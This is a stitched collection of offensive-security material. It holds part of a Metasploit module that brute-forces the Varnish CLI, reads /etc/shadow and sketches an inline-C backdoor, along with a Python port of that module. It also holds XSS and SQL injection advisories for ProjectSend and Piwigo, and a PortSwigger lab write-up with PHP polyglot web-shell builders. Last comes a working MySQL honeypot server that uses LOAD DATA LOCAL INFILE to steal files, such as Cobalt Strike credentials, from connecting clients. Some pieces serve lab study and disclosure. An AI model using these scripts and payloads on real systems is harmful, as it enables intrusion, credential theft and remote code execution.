      'Description' => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce list of passwords. This module will also attempt to read the /etc/shadow root password hash if a valid password is found. It is possible to execute code as root with a valid password, however this is not yet implemented in this module.',
      'References'  =>
        [
          [ 'OSVDB', '67670' ],
          [ 'CVE', '2009-2936' ], # General
          [ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ],
          [ 'CVE', '1999-0502'] # Weak password
        ],
      'Author'      => [ 'patrick' ],
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(6082),
        OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
          File.join(Msf::Config.data_directory, "wordlists", "unix_passwords.txt") ]),
      ], self.class)

    deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS')
  end

  def run_host(ip)
    connect
    res = sock.get_once(-1,3) # detect banner

    if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
      vprint_status("Varnishd CLI detected - authentication required.")

      each_user_pass { |user, pass|
        sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail.
        res = sock.get_once(-1,3) # grab challenge

        if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
          challenge = $1
          secret = pass + "\n" # newline is needed
          response = challenge + "\n" + secret + challenge + "\n"
          response = Digest::SHA256.hexdigest(response)
          sock.put("auth #{response}\n")
          res = sock.get_once(-1,3)

          if (res =~ /107 \d+/) # 107 auth
            vprint_status("FAILED: #{secret}")
          elsif (res =~ /200 \d+/) # 200 ok
            print_good("GOOD: #{secret}")
            report_auth_info(
              :host => rhost,
              :port => rport,
              :sname => ('varnishd'),
              :pass => pass,
              :proof => "#{res}",
              :source_type => "user_supplied",
              :active => true
            )
            sock.put("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} /etc/shadow\n") # only returns 1 line of any target file.
            res = sock.get_once(-1,3)
            if (res =~ /root:([\D\S]+):/) # lazy.
              if ($1[0] == "!")
                vprint_error("/etc/shadow root uid is disabled.\n")
              else
                print_good("/etc/shadow root enabled:\nroot:#{$1}:")
              end
            else
              vprint_error("Unable to read /etc/shadow?:\n#{res}\n")
            end
            break
          else
            vprint_error("Unknown response:\n#{res}\n")
          end
        end
      }
    elsif (res =~ /Varnish Cache CLI 1.0/)
      print_good("Varnishd CLI does not require authentication!")
    else
      vprint_error("Unknown response:\n#{res}\n")
    end

    disconnect
  end
end

=begin
aushack notes:

- varnishd typically runs as root, forked as unpriv.
- 'param.show' lists configurable options.
- 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed.
- 'user' is nobody. param.set user root (may have to stop/start the child to activate)
- 'group' is nogroup. param.set group root (may have to stop/start the child to activate)
- (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail).
- vcc_unsafe_path is on. used to 'import ../../../../file' etc.
- vcc_allow_inline_c is off. param.set vcc_allow_inline_c on to enable code execution.
- code execution notes:
  * quotes must be escaped \"
  * \n is a newline
  * C{ }C denotes raw C code.
  * e.g. C{ unsigned char shellcode[] = \"\xcc\"; }C
  * #import <stdio.h> etc must be "newline", i.e. C{ \n#include <stdlib.h>\n dosomething(); }C (without 2x \n, include statement will not interpret correctly).
  * C{ asm(\"int3\"); }C can be used for inline assembly / shellcode.
  * varnishd has its own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic.
  * example trigger for backdoor:

    VCL server:

    vcl.inline foo "vcl 4.0;\nbackend b { . host = \"127.0.0.1\"; } sub vcl_recv { if (req.url ~ \"^/backd00r\") { C{ asm(\"int3\"); }C } } \n"
    vcl.use foo
    start

    Attacker:

    telnet target 80
    GET /backd00r HTTP/1.1
    Host: 127.0.0.1

    (... wait for child to execute debug trap INT3 / shellcode).

CLI protocol notes from website:

The CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end.

Requests are whitespace separated tokens terminated by a newline (NL) character.

Tokens can be quoted with "..." and common backslash escape forms are accepted: (\n), (\r), (\t), (\ ), (\"), (\%03o) and (\x%02x)

The response consists of a header which can be read as fixed format or ASCII text:

  1-3   %03d  Response code
  4     ' '   Space
  5-12  %8d   Length of body
  13    \n    NL character.

Followed by the number of bytes announced by the header.

The Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h:

enum cli_status_e {
  CLIS_SYNTAX  = 100,
  CLIS_UNKNOWN = 101,
  CLIS_UNIMPL  = 102,
  CLIS_TOOFEW  = 104,
  CLIS_TOOMANY = 105,
  CLIS_PARAM   = 106,
  CLIS_OK      = 200,
  CLIS_CANT    = 300,
  CLIS_COMMS   = 400,
  CLIS_CLOSE   = 500
};
=end
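The two protocol pieces the module depends on, the fixed-format response header from the notes above and the SHA256 challenge/response it computes, as an added example in Python (not part of the Metasploit module or of Varnish). `make_107` builds a constructed 107 response in the `%03d %8d\n` layout for local testing; `login` shows the exchange against a connected socket and is the only function that touches the network. Status code 107 for "Authentication required" is taken from the module's regexes, not from the enum in the notes.

```python
import hashlib
import re

# Added example, not part of the Metasploit module above.
CLIS_OK = 200
CLIS_AUTH = 107   # "Authentication required", the code the module matches on

# "%03d <space> %8d <NL>": accept the length padded on either side of the digits,
# which also covers the "107 59      \n" shape the module's regex expects.
_HEADER = re.compile(rb"(\d{3}) +(\d+) *\n")


def parse_response(raw: bytes):
    """Split one CLI response into (status, body, remaining_bytes)."""
    m = _HEADER.match(raw)
    if m is None:
        raise ValueError("not a CLI response header: %r" % raw[:16])
    status, length = int(m.group(1)), int(m.group(2))
    body = raw[m.end():m.end() + length]
    if len(body) != length:
        raise ValueError("short body: want %d bytes, have %d" % (length, len(body)))
    return status, body, raw[m.end() + length:]


def challenge_from_107(body: bytes) -> str:
    """The challenge is the first line of a 107 body."""
    return body.split(b"\n", 1)[0].decode("ascii")


def auth_response(challenge: str, secret: bytes) -> str:
    """hex(SHA256(challenge + '\n' + secret + challenge + '\n')).
    `secret` is the full content of varnishd's secret file, which normally ends with a
    newline; that is why the module appends '\n' to each wordlist entry."""
    c = challenge.encode("ascii")
    return hashlib.sha256(c + b"\n" + secret + c + b"\n").hexdigest()


def auth_command(challenge: str, password: str) -> bytes:
    """The line the module sends: 'auth <hex>\n' with secret = password + '\n'."""
    return b"auth " + auth_response(challenge, password.encode() + b"\n").encode() + b"\n"


def make_107(challenge: str) -> bytes:
    """Constructed 107 response (not captured from a server) in the notes' header layout."""
    body = challenge.encode("ascii") + b"\n\nAuthentication required.\n"
    return b"107 %8d\n" % len(body) + body


def login(sock, password: str) -> bool:
    """One authentication round on a connected socket: read the banner, answer the
    challenge, report whether varnishd replied 200. Returns True on an open CLI too."""
    status, body, _ = parse_response(sock.recv(4096))
    if status == CLIS_OK:
        return True                                   # no authentication required
    if status != CLIS_AUTH:
        return False
    sock.sendall(auth_command(challenge_from_107(body), password))
    status, _, _ = parse_response(sock.recv(4096))
    return status == CLIS_OK
```

`parse_response` returns the unconsumed tail so several responses read in one `recv` can be split; the module's one-regex-per-read approach silently drops anything after the first match.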
-
ProjectSend r561 - Multiple Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# Exploit Title: ProjectSend r561 - Cross Site Scripting & Full Path Disclosure Vulnerabilities
# Date: 19/12/2014
# Url Vendor: http://www.projectsend.org/
# Vendor Name: ProjectSend
# Version: r561 Ultimate Version
# CVE: CVE-2014-1155
# Author: TaurusOmar
# Twitter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: Medium

Description

ProjectSend is a client-oriented file uploading utility. Clients are created and assigned a username and a password. Files can then be uploaded under each account with the ability to add a title and description to each. When a client logs in from any browser anywhere, the client will see a page that contains your company logo and a sortable list of every file uploaded under the client's name, with description, time, date, etc. It also works as a history of "sent" files, provides the differences between revisions, the time that it took between each revision, and so on.

------------------------
+ CROSS SITE SCRIPTING +
------------------------

# Exploiting Description
- Inject XSS code into the image description box.

<textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">DESCRIPTION</textarea>

#P0c
"><img src=x onerror=;;alert('XSS') />

<textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">CODE XSS</textarea>

#Proof Concept
http://i.imgur.com/FOPIvd4.jpg

------------------------
+ FULL PATH DISCLOSURE +
------------------------

# Exploiting Description
- The URL discloses the platform's directory.

#P0c
http://site.com/projectsend/templates/pinboxes/template.php

#Proof Concept
http://i.imgur.com/xfN4kDV.jpg
-
Piwigo 2.7.2 - Multiple Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# Exploit Title: Piwigo 2.7.2 - SQL Injection / Cross Site Scripting Vulnerabilities
# Date: 19/12/2014
# Url Vendor: http://www.piwigo.org/
# Vendor Name: Piwigo
# Version: 2.7.2
# CVE: CVE-2014-1470
# CVE References: CVE-2013-1468, CVE-2013-1469
# Author: TaurusOmar
# Twitter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: High

Description

Piwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of pictures.

------------------------
+ CROSS SITE SCRIPTING +
------------------------

# Exploiting Description
- Inject XSS code into the group list box.

<fieldset>
  <legend>Add Group</legend>
  <p>
    <strong>Name Group</strong><br>
    YOUR GROUP NAME OR POC
    <input type="text" size="20" maxlength="50" name="groupname">
  </p>
  <p class="actionButtons">
    <input type="submit" value="Add" name="submit_add" class="submit">
    <a id="addGroupClose" href="#">Cancel</a>
  </p>
  <input type="hidden" value="24322c55681c00da423a8a7b21b79640" name="pwg_token">
</fieldset>

#P0c
"><img src=x onerror=prompt(1);>

#Proof Concept
http://i.imgur.com/qFyJz6q.jpg

------------------------
+ Sql Injection +
------------------------

# Exploiting Description
- SQL injection in the control panel of the admin and other users.

#P0c
http://site.com/piwigo/admin.php?page=history&search_id=5'

SELECT date, time, user_id, IP, section, category_id, tag_ids, image_id, image_type FROM ucea_history WHERE ; in /home/site.com/public_html/piwigo/include/dblayer/functions_mysqli.inc.php on line 830

#Proof Concept
http://i.imgur.com/wpzMmmu.jpg
-
Remote code execution via polyglot web shell upload – PortSwigger Write Up
In this post we will be solving the PortSwigger lab "Remote code execution via polyglot web shell upload".

To solve the lab we have to upload a PHP file that reads and shows us the contents of the file /home/carlos/secret, since to prove that we have completed the lab we must submit the contents of that file. In addition, the server is configured to check whether the file is an image by looking at its contents.

In this case the lab itself gives us an account to log in with, so let's do that:

Once logged in, we find the account profile:

As we can see, there is an option to upload a file, and specifically it seems to be for updating the profile avatar. Let's try to take advantage of this option to upload the following PHP file:

Note that in this case, besides the PHP code itself, I am defining a string at the start of the file. This is because the first bytes of a file, known as "magic numbers", are used to determine its content type. These first bytes determine what type a file is, or how it will be treated, even if the rest of the content is completely different.

As we can see, it contains PHP code, but Linux itself detects it as an image; this happens because of the magic numbers. The following link has a list of the magic numbers associated with the different file types: https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5

With that understood, we configure Burp Suite to intercept requests:

Once Burp Suite is ready with the proxy, we select the file and upload it:

Burp Suite intercepts the upload request:

To work with the request more comfortably we send it to Repeater, and at the same time press Send to analyse the response:

It seems to have been uploaded without problems. Let's view this response in the browser:

From here on we no longer need Burp Suite, so we disable the proxy:

With that done, we go to our profile:

Now, looking at the profile, we can see that the avatar has changed and now shows an error that the image does not load correctly:

This is probably because it is trying to load our PHP file as if it were an image and, of course, fails to do so. To confirm that it is our PHP file, we right-click to go to the exact path of "the image":

As we can see, it is indeed our PHP file, and besides the string placed to set the magic numbers we can see the contents of the secret file; in other words, the output of the interpreted PHP code.

With the contents of secret, we simply submit the answer:

And that way we solve the lab:

Besides the solution we carried out, PortSwigger suggests another rather curious one that is worth mentioning:

Create a file exploit.php that reads the contents of Carlos's secret file, for example: <?php echo file_get_contents('/home/carlos/secret'); ?>

Log in and try to upload our PHP file as the avatar. As we will see, the server blocks any upload that is not an image.

Let's create a PHP/JPG polyglot, that is, a file that is an image but contains PHP code in its metadata. To do this it is as simple as taking any image and adding custom metadata to it with exiftool. Example: exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php . This adds the PHP payload to the comment field of the metadata, and with that we save the image with a .php extension.

Now upload this file; we will see that there is no problem. With that done, we go back to our profile.

If we go to Burp Suite's HTTP History we can see a GET request to the supposed avatar image (this request was made when we accessed our profile and the avatar tried to load). If we take this request and look at its response, we can see the contents of Carlos's secret file.

Submit the solution and the lab is solved.
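Both tricks from the write-up, a magic-number prefix in front of PHP and a JPEG whose COM (comment) segment carries PHP (which is what `exiftool -Comment=...` writes), as an added example in Python; this is not code from PortSwigger or from the lab. `sniff` is a stand-in for the content check the lab server performs and is an assumption about how such a filter works, not the lab's implementation; `jpeg_with_comment` produces a minimal SOI/COM/EOI file that passes a magic-number check but is not a viewable picture, which is why the write-up starts from a real image instead.

```python
import struct

# Added example, not code from PortSwigger or the write-up.
PHP_PAYLOAD = b"<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>"

MAGIC = {                      # leading bytes -> type, as in the linked magic-number list
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}


def sniff(data: bytes):
    """Content-based type detection, the check a magic-number upload filter performs."""
    for sig, mime in MAGIC.items():
        if data.startswith(sig):
            return mime
    return None


def prefix_polyglot(magic: bytes, php: bytes) -> bytes:
    """Method 1 from the write-up: an image signature in front of the PHP code. The PHP
    engine echoes the prefix verbatim and then executes the <?php ... ?> block."""
    return magic + php


def jpeg_with_comment(comment: bytes) -> bytes:
    """Method 2: a JPEG whose COM (0xFFFE) segment holds the payload. The 16-bit segment
    length includes its own two bytes, so one COM payload is limited to 65533 bytes."""
    if len(comment) > 0xFFFF - 2:
        raise ValueError("comment too long for a single COM segment")
    com = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + com + b"\xff\xd9"          # SOI, COM, EOI


def jpeg_segments(data: bytes):
    """Walk marker segments up to SOS or EOI, yielding (marker, payload) pairs."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: no SOI marker")
    i = 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            raise ValueError("expected a marker at offset %d" % i)
        marker = data[i + 1]
        if marker == 0xD9:                          # EOI
            return
        if i + 4 > len(data):
            raise ValueError("truncated segment at offset %d" % i)
        length = struct.unpack(">H", data[i + 2:i + 4])[0]
        yield marker, data[i + 4:i + 2 + length]
        if marker == 0xDA:                          # SOS: entropy-coded data follows
            return
        i += 2 + length


def find_php(data: bytes):
    """First <?php ... ?> block in the file, i.e. what the PHP engine would execute."""
    start = data.find(b"<?php")
    if start < 0:
        return None
    end = data.find(b"?>", start)
    return data[start:end + 2] if end >= 0 else data[start:]
```

The point of the lab is that `sniff` and `find_php` answer different questions: a file can satisfy the image signature and still contain executable PHP, and nothing in a JPEG comment stops the PHP engine from running it once the file is served with a .php extension.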
-
Title: A MySQL honeypot that reads the attacker's computer configuration file
There are already far too many articles on the Internet about the specific technical details of MySQL honeypots; you can search for them yourself. A short introduction: MySQL has a LOAD DATA LOCAL INFILE feature that can read a local file into a MySQL database. When an attacker uses a scanner that brute-forces MySQL passwords, scans for MySQL and connects to it (a correction here: simply connecting to the MySQL honeypot is enough for the honeypot to read a local configuration file; the correct username and password do not have to be supplied), the honeypot adds a LOAD DATA LOCAL INFILE to the response packet sent to the client (the attacker), reads the attacker's local file into the database, and so achieves the goal of a countermeasure. (The following picture is from an Internet search.)

The CS configuration file stores the password in plaintext

As long as you use the CS (Cobalt Strike) client to connect to a computer running the CS server, the CS client generates a .aggressor.prop configuration file in a fixed folder. On Windows the file is located at C:\Users\Administrator\.aggressor.prop. This configuration file contains the IP address, port, username and password of the CS remote-control server, all in plaintext! As shown in the figure below:

Every time CS is opened, the IP address, port, username, password and other information used to log in are displayed; this information is saved in the local .aggressor.prop file. Typical contents are shown in the figure below.

So we reached the following conclusion: build a MySQL honeypot. When the attacker connects to the honeypot, the honeypot uses the MySQL local file read vulnerability to automatically read the contents of the C:\Users\Administrator\.aggressor.prop file. The honeypot can then successfully obtain the attacker's CS server IP address, port, username and password.

Building the experimental environment

To verify the guess above, it has to be tested for real. I found a MySQL honeypot script written in Python on GitHub, simply modified it locally, changing the file read path to C:\Users\Administrator\.aggressor.prop, and ran the script. As shown in the figure below, a MySQL honeypot listening on local port 3306 is up.

To simulate the behaviour of a red-team operator connecting to MySQL, I used Navicat to connect remotely to the honeypot's IP address. (To emphasise once again: you do not need to know the MySQL username and password; enter a wrong username and password and the MySQL honeypot can still read the local file.)

As shown in the figure below, the MySQL honeypot writes the Base64-encoded contents of the CS configuration file to a log file in the current directory.

The result after Base64 decoding is as follows:

The obtained IP address, port, username and password could be used to connect to the CS server (the following picture is from the Internet).

Under Windows, WeChat's default configuration file is placed in C:\Users\<username>\Documents\WeChat Files. Looking into it, you can see that it contains C:\Users\<username>\Documents\WeChat Files\alues\config\config.data.
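The packet-level core of such a honeypot, as an added example in Python; it is not the GitHub script the post refers to. It greets the client, accepts whatever credentials arrive, and answers the client's first query with a LOAD DATA LOCAL INFILE request (a 0xFB byte followed by the file name), after which a client that has CLIENT_LOCAL_FILES enabled streams that file back in packets terminated by an empty packet. Packet layouts follow the MySQL client/server protocol (HandshakeV10, OK packet, LOCAL INFILE request); `TARGET_PATH` is taken from the post, the server version string and the plain-stdout logging are assumptions, and the file contents in the usage are constructed, not captured.

```python
import os
import socket
import struct

# Added example, not the honeypot script from GitHub that the post describes.
TARGET_PATH = r"C:\Users\Administrator\.aggressor.prop"   # from the post; adjust as needed

CLIENT_LONG_PASSWORD, CLIENT_LOCAL_FILES = 0x0001, 0x0080
CLIENT_PROTOCOL_41, CLIENT_SECURE_CONNECTION = 0x0200, 0x8000
CAPABILITIES = CLIENT_LONG_PASSWORD | CLIENT_LOCAL_FILES | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION


def frame(payload: bytes, seq: int) -> bytes:
    """MySQL packet: 3-byte little-endian length, 1-byte sequence id, payload."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def unframe(buf: bytes, offset: int = 0):
    """Return (seq, payload, next_offset) for the packet starting at `offset`."""
    if len(buf) < offset + 4:
        raise ValueError("short packet header")
    length = int.from_bytes(buf[offset:offset + 3], "little")
    payload = buf[offset + 4:offset + 4 + length]
    if len(payload) != length:
        raise ValueError("short packet body")
    return buf[offset + 3], payload, offset + 4 + length


def handshake_v10(salt: bytes, version: bytes = b"5.7.0-honeypot", conn_id: int = 1) -> bytes:
    """Protocol::HandshakeV10 greeting advertising CLIENT_LOCAL_FILES (no plugin auth)."""
    if len(salt) != 20:
        raise ValueError("salt must be 20 bytes")
    payload = (b"\x0a" + version + b"\x00" + struct.pack("<I", conn_id)
               + salt[:8] + b"\x00"                        # auth-plugin-data-part-1, filler
               + struct.pack("<H", CAPABILITIES & 0xFFFF)
               + b"\x21"                                   # charset utf8_general_ci
               + struct.pack("<H", 0x0002)                 # SERVER_STATUS_AUTOCOMMIT
               + struct.pack("<H", CAPABILITIES >> 16)
               + b"\x00" + b"\x00" * 10                    # auth data length (unused), reserved
               + salt[8:] + b"\x00")                       # auth-plugin-data-part-2: 12 bytes + NUL
    return frame(payload, 0)


def ok_packet(seq: int) -> bytes:
    """OK: header 0x00, affected rows 0, last insert id 0, status AUTOCOMMIT, 0 warnings."""
    return frame(b"\x00\x00\x00\x02\x00\x00\x00", seq)


def local_infile_request(path: str, seq: int) -> bytes:
    """0xFB + file name: the response that asks the client to upload a local file."""
    return frame(b"\xfb" + path.encode(), seq)


def client_file_packets(contents: bytes, first_seq: int, chunk: int = 0xFFFFFF) -> bytes:
    """What a cooperating client sends back: the file in packets, then an empty packet."""
    out, seq = b"", first_seq
    for i in range(0, len(contents), chunk):
        out += frame(contents[i:i + chunk], seq)
        seq += 1
    return out + frame(b"", seq)


def collect_file(buf: bytes, offset: int = 0):
    """Reassemble client file packets; returns (contents, next_offset, terminator_seq)."""
    chunks = []
    while True:
        seq, payload, offset = unframe(buf, offset)
        if not payload:
            return b"".join(chunks), offset, seq
        chunks.append(payload)


def recv_packet(conn) -> bytes:
    """Read exactly one framed packet from a socket."""
    def exact(n):
        data = b""
        while len(data) < n:
            part = conn.recv(n - len(data))
            if not part:
                raise ConnectionError("client closed the connection")
            data += part
        return data
    header = exact(4)
    return header + exact(int.from_bytes(header[:3], "little"))


def serve_client(conn, path: str = TARGET_PATH) -> bytes:
    """One session: greet, accept any credentials, answer the first COM_QUERY with a
    LOCAL INFILE request for `path`, and return whatever the client sends back."""
    conn.sendall(handshake_v10(os.urandom(20)))
    seq, _login, _ = unframe(recv_packet(conn))     # HandshakeResponse41; credentials ignored
    conn.sendall(ok_packet(seq + 1))
    seq, cmd, _ = unframe(recv_packet(conn))        # first command, normally COM_QUERY (0x03)
    if cmd[:1] != b"\x03":
        conn.sendall(ok_packet(seq + 1))
        return b""
    conn.sendall(local_infile_request(path, seq + 1))
    chunks = []
    while True:
        seq, payload, _ = unframe(recv_packet(conn))
        if not payload:                             # empty packet ends the upload
            break
        chunks.append(payload)
    conn.sendall(ok_packet(seq + 1))
    return b"".join(chunks)


if __name__ == "__main__":
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", 3306))
        srv.listen(5)
        while True:
            client, addr = srv.accept()
            with client:
                try:
                    print(addr[0], "sent", serve_client(client)[:200])
                except (ConnectionError, ValueError) as exc:
                    print(addr[0], "failed:", exc)
```

Clients that do not set CLIENT_LOCAL_FILES (for example the mysql command-line client without --local-infile=1) answer the 0xFB request with an error packet instead of the file, which `serve_client` surfaces as an empty result; GUI clients such as the one used in the post typically enable it.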